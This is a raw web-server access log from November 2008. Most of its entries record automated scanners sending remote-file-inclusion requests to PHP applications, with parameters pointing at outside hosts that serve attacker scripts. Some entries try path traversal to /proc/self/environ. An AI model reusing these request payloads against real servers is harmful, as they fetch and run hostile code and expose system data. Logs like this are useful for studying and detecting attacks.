200.49.188.178 - - [29/Nov/2008:10:00:49 -0800] "GET /logs/index.phpmain.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:00:59 -0800] "GET /logs/access_081117.log%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.49.188.178 - - [29/Nov/2008:10:01:02 -0800] "GET /logs/access_080614.log/index.phpmain.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:01:18 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:10:01:23 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:10:01:23 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:10:01:24 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:01:24 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.26 - - [29/Nov/2008:10:01:26 -0800] "GET /logs/access_080824.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.30.87.112 - - [29/Nov/2008:10:01:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:01:51 -0800] "GET /logs/access_081117.log%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:51 -0800] "GET /logs/access_080601.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:51 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:52 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:57 -0800] "GET /logs/access_080601.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:57 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:58 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:58 -0800] "GET /logs/access_080601.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:59 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:01:59 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.26 - - [29/Nov/2008:10:02:02 -0800] "GET /logs/access_080824.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:10:02:11 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:02:17 -0800] "GET /logs/access_080511.log/senetman/html/index.php?page=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:02:20 -0800] "GET /senetman/html/index.php?page=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.87.112 - - [29/Nov/2008:10:02:20 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 9435 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:02:20 -0800] "GET /logs/senetman/html/index.php?page=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:02:33 -0800] "GET /logs/access_080412.log/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:02:33 -0800] "GET /logs/access_080412.log/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:02:33 -0800] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:02:33 -0800] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:02:34 -0800] "GET /logs/access_080409.log/senetman/html/index.php?page=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:02:35 -0800] "GET /logs/access_080601.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:02:36 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:02:36 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:02:45 -0800] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:02:45 -0800] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:03:08 -0800] "GET /logs/access_080412.log/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:03:08 -0800] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:03:08 -0800] "GET /logs/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:03:09 -0800] "GET /logs/access_080412.log/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:03:09 -0800] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:03:09 -0800] "GET /logs/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:25 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:25 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:26 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:03:26 -0800] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:03:26 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:03:27 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:29 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:29 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:30 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:33 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:33 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:33 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:03:46 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:04:06 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:04:07 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:05:17 -0800] "GET /logs/access_080402.log//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:05:31 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:05:31 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:05:33 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:05:58 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:06:22 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:06:39 -0800] "GET /logs/access_080929.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:47 -0800] "GET /logs/access_080401.log/?_zb_path=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:47 -0800] "GET /logs/access_080401.log/errors.php?error=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:48 -0800] "GET /logs/access_080401.log/?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:48 -0800] "GET /logs/access_080401.log/?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:50 -0800] "GET /errors.php?error=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:52 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 95264 "-" "XXXXXX" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:52 -0800] "GET /?_zb_path=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 200 94644 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:54 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 95301 "-" "XXXXXX" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:55 -0800] "GET /logs/errors.php?error=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:57 -0800] "GET /logs/?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 75738 "-" "XXXXXX" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:57 -0800] "GET /logs/?_zb_path=http://www.popsculpt.com/manage/files/i?? HTTP/1.1" 200 75738 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.171.202.85 - - [29/Nov/2008:10:06:58 -0800] "GET /logs/?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 75738 "-" "XXXXXX" "www.dmulk.com"
64.27.13.94 - - [29/Nov/2008:10:07:01 -0800] "GET /logs/access_080414.log HTTP/1.1" 200 1336556 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:10:07:27 -0800] "GET /logs/index2.php?to=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:10:07:28 -0800] "GET /index2.php?to=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:07:42 -0800] "GET /logs/access_080416.log//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:07:52 -0800] "GET /logs/access_080416.log//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.0.108 - - [29/Nov/2008:10:08:26 -0800] "GET /logs/access_080510.log/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.0.108 - - [29/Nov/2008:10:08:26 -0800] "GET /logs/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.0.108 - - [29/Nov/2008:10:08:26 -0800] "GET /index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 200 94674 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.49.156 - - [29/Nov/2008:10:08:27 -0800] "GET /logs/access_080510.log/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.49.156 - - [29/Nov/2008:10:08:28 -0800] "GET /logs/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.49.156 - - [29/Nov/2008:10:08:28 -0800] "GET /index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.0" 200 94623 "-" "libwww-perl/5.53" "www.dmulk.com"
83.238.170.128 - - [29/Nov/2008:10:08:35 -0800] "GET /logs/access_080510.log/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.238.170.128 - - [29/Nov/2008:10:08:36 -0800] "GET /logs/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.238.170.128 - - [29/Nov/2008:10:08:36 -0800] "GET /index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 200 94674 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:10:08:38 -0800] "GET /logs/errors.php?error=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:10:08:39 -0800] "GET /errors.php?error=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
117.110.136.131 - - [29/Nov/2008:10:09:14 -0800] "GET /logs/index.php?arquivo=http://namak.hs.kr/da/include/board.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [29/Nov/2008:10:09:14 -0800] "GET /logs/access_080510.log/index.php?arquivo=http://namak.hs.kr/da/include/board.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [29/Nov/2008:10:09:15 -0800] "GET /index.php?arquivo=http://namak.hs.kr/da/include/board.do??? HTTP/1.1" 200 94737 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:09:43 -0800] "GET /logs/access_071122.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:09:44 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:09:44 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.209.107.37 - - [29/Nov/2008:10:09:59 -0800] "GET /logs/access_080731.log//zero_vote/login.php?dir=http://www.geocities.com/maros_cool/kangkung.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.209.107.37 - - [29/Nov/2008:10:09:59 -0800] "GET /zero_vote/login.php?dir=http://www.geocities.com/maros_cool/kangkung.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.209.107.37 - - [29/Nov/2008:10:09:59 -0800] "GET /logs//zero_vote/login.php?dir=http://www.geocities.com/maros_cool/kangkung.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.97.49.156 - - [29/Nov/2008:10:10:04 -0800] "GET /logs/access_081009.log/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
94.23.0.108 - - [29/Nov/2008:10:10:30 -0800] "GET /logs/access_081009.log/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.238.170.128 - - [29/Nov/2008:10:10:49 -0800] "GET /logs/access_081009.log/index.php?arquivo=http://phoenixgc.net/help/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
117.110.136.131 - - [29/Nov/2008:10:11:18 -0800] "GET /logs/access_081009.log/index.php?arquivo=http://namak.hs.kr/da/include/board.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:11:25 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:11:25 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:10:12:22 -0800] "GET /logs/access_080726.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:10:12:23 -0800] "GET /com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:10:12:23 -0800] "GET /logs//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:10:12:25 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:10:12:25 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:10:12:52 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:10:12:52 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:13:04 -0800] "GET /logs/access_080502.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.111.173.72 - - [29/Nov/2008:10:13:04 -0800] "GET /logs/access_080726.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gruzkont.ru//assets/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [29/Nov/2008:10:13:05 -0800] "GET /com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gruzkont.ru//assets/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [29/Nov/2008:10:13:05 -0800] "GET /logs//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gruzkont.ru//assets/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:13:46 -0800] "GET /logs/access_080528.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
